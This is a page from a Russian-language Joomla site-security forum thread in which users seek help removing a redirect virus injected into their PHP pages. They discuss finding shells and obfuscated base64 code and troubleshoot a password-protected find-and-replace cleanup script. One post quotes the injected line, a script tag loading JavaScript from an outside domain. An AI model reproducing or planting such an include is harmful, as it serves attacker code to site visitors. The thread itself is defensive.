[Решено] В php файлах во всех появилась хрень какая-то появилось давно что это ? - страница 3 - Безопасность сайтов на Joomla

Кто за определенную плату может полечтить сайт от вируса-редиректа?

Я могу. Отписал в личку.

Уважаемые форумчане!
Подскажите пожалуйста, а как вот с таким вредоносным кодом бороться?
<script src="http://fetily.in/rss.js"></script>
Заранее признателен.

Искать, как внедрили код. То есть через что ломали, возможно, залитые шеллы, а потом чистить скрипты от внедрений. Можно воспользоваться скриптами с форума и прочими средствами (антивирусные утилиты, программы массовой замены текста).

А где этот код размещается ? Удаляй.

А где этот код размещается ? Удаляй.

В конце страниц (и страниц на сайте много).
Есть какой-нибудь способ автоматической (то есть "не ручной") очистки? Сразу оговорюсь, что все антивирусники дружно говорят, то, что всё обстоит просто замечательно.  При этом вредоносный код определяется яндексом и он же на сайт "сильно ругается".
 

Пока нет, но я думал про это, так как нужно искать еще строки больше определенной длины (обфусцированный код или закодированный через base64_encode обычно имеет большую длину и без пробелов), вообще скрипт пригодится и для обычной работы с сайтом, часто возникает потребность найти в коде что-то, а без скачивания сайта или отдельных папок себе на компьютер не обойтись, есть наверное ftp клиенты с поиском по содержимому файов, но они будут работать намного медленнее чем скрипт, так как скрипт использует ресурсы сервера, а  ftp клиент домашнего компьютера на котором установлен. Если кому нужно можно переделать в компонент для Joomla.

Доброго вам дня. Скажите скрипт будет на localhoste работать? И если да то как его правильно запустить?

Скажите скрипт будет на localhoste работать?

Да. запуск как и на хостинге.

Да. запуск как и на хостинге.

А у меня не запускается - ошибка 404 пишет

ошибка 404 пишет

Неправильный url вводите?

2 варианта- неправильный URL ил неправильный пароль

2 варианта- неправильный URL ил неправильный пароль

Ввожу http://localhost/имя сайта/replace.php?pas=joomla  - выдает ошибку 404
Про пароль не понял, где его вводить?

Чет не то наверно вводите.

//Параметры
define('PASS', 'Dr57fd'); //пароль (желательно поменять на свой). Для запуска скрипта, в браузер введите адрес http://example.com/far.php?pass=Dr57fd, где example.com - адрес вашего сайта, Dr57fd - ваш пароль

Если far

Чет не то наверно вводите.

//Параметры
define('PASS', 'Dr57fd'); //пароль (желательно поменять на свой). Для запуска скрипта, в браузер введите адрес http://example.com/far.php?pass=Dr57fd, где example.com - адрес вашего сайта, Dr57fd - ваш пароль

Вроде делал все правильно. Теперь 404 не выпадает, но скрипт все равно не запускается, пишет ошибку  Notice: Undefined index: pass in D:\wamp\www\domcom-tv\far.php on line 22. Так что ничего не понимаю ведь 22 линия - защита от несанкционированного доступа и хакерских сканеров
Что надо смотреть в моем случае?